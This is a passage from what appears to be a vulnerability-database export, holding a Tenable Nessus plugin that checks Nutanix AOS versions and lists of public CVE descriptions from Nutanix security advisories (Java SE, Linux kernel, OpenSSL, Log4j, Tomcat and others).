ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker\n with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks\n of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM\n Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in\n clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run\n untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This\n vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service\n which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to\n enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest\n would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak\n of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to\n 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to\n disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the\n L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire\n system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest\n OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - The Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.5 and 1.19.x before 1.19.3 has\n a NULL pointer dereference in kdc/do_tgs_req.c via a FAST inner body that lacks a server field.\n (CVE-2021-37750)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows\n privilege escalation because supplemental groups are not initialized as expected. Helper programs for\n AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group\n memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to\n 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP\n upgrade connections was not released for WebSocket connections once the connection was closed. This\n created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through\n 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft\n source code that renders different logic than the logical ordering of tokens ingested by compilers and\n interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such\n that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium\n offers the following alternative approach to presenting this concern. An issue is noted in the nature of\n international text that can affect applications that implement support for The Unicode Standard and the\n Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-\n right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can\n further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such\n that the ordering of tokens perceived by human reviewers does not match what will be processed by a\n compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its\n document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also\n provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode\n Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the\n BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading\n visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow\n when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures\n encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for\n certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how\n they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and\n PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and\n Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-\n default configurations. This could allows attackers with control over Thread Context Map (MDC) input data\n when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for\n example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input\n data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some\n environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix\n this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.nutanix.com/advisories/NXSA-AOS-6-0-2-5.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the Nutanix AOS software to recommended version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4658\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-43527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:nutanix:aos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"nutanix_collect.nasl\");\n script_require_keys(\"Host/Nutanix/Data/lts\", \"Host/Nutanix/Data/Service\", \"Host/Nutanix/Data/Version\", \"Host/Nutanix/Data/arch\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::nutanix::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '6.0.2.5', 'product' : 'AOS', 'fixed_display' : 'Upgrade the AOS install to 6.0.2.5 or higher.', 'lts' : FALSE },\n { 'fixed_version' : '6.0.2.5', 'product' : 'NDFS', 'fixed_display' : 'Upgrade the AOS install to 6.0.2.5 or higher.', 'lts' : FALSE }\n];\n\nvcf::nutanix::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-30T16:16:28", "description": "The version of AOS installed on the remote host is prior to 6.1. It is, therefore, affected by multiple vulnerabilities as referenced in the NXSA-AOS-6.1 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16;\n Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N). (CVE-2021-2163)\n\n - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.\n (CVE-2017-5715)\n\n - Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.\n (CVE-2017-5753)\n\n - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. (CVE-2017-5754)\n\n - An issue was discovered in the Linux kernel through 5.11.3. A kernel pointer leak can be used to determine the address of the iscsi_transport structure. When an iSCSI transport is registered with the iSCSI subsystem, the transport's handle is available to unprivileged users via the sysfs file system, at /sys/class/iscsi_transport/$TRANSPORT_NAME/handle. When read, the show_transport_handle function (in drivers/scsi/scsi_transport_iscsi.c) is called, which leaks the handle. This handle is actually the pointer to an iscsi_transport struct in the kernel module's global variables. (CVE-2021-27363)\n\n - An issue was discovered in the Linux kernel through 5.11.3. drivers/scsi/scsi_transport_iscsi.c is adversely affected by the ability of an unprivileged user to craft Netlink messages. (CVE-2021-27364)\n\n - An issue was discovered in the Linux kernel through 5.11.3. Certain iSCSI data structures do not have appropriate length constraints or checks, and can exceed the PAGE_SIZE value. An unprivileged user can send a Netlink message that is associated with iSCSI, and has a length up to the maximum length of a Netlink message. (CVE-2021-27365)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Networking). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2021-2341)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Library). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 4.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N). (CVE-2021-2369)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H). (CVE-2021-2388)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory corruption) via a crafted XML document. (CVE-2016-4658)\n\n - A flaw was found in the way RTAS handled memory accesses in userspace to kernel communication. On a locked down (usually due to Secure Boot) guest system running on top of PowerVM or KVM hypervisors (pseries platform) a root like local user could use this flaw to further increase their privileges to that of a running kernel. (CVE-2020-27777)\n\n - A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c.\n This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space (CVE-2021-22555)\n\n - BPF JIT compilers in the Linux kernel through 5.11.12 have incorrect computation of branch displacements, allowing them to execute arbitrary code within the kernel context. This affects arch/x86/net/bpf_jit_comp.c and arch/x86/net/bpf_jit_comp32.c. (CVE-2021-29154)\n\n - An issue was discovered in the Linux kernel before 5.11.11. The netfilter subsystem allows attackers to cause a denial of service (panic) because net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h lack a full memory barrier upon the assignment of a new table value, aka CID-175e476b8cdf.\n (CVE-2021-29650)\n\n - net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI controller. (CVE-2021-32399)\n\n - Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding;\n and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.\n (CVE-2021-33037)\n\n - In BIND 9.0.0 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.9.3-S1 -> 9.11.29-S1 and 9.16.8-S1 -> 9.16.13-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.11 of the BIND 9.17 development branch, when a vulnerable version of named receives a query for a record triggering the flaw described above, the named process will terminate due to a failed assertion check. The vulnerability affects all currently maintained BIND 9 branches (9.11, 9.11-S, 9.16, 9.16-S, 9.17) as well as all other versions of BIND 9. (CVE-2021-25215)\n\n - Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16;\n Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. It can also be exploited by supplying untrusted data to APIs in the specified Component. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). (CVE-2021-2161)\n\n - Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n (CVE-2021-44832)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. (CVE-2021-22543)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 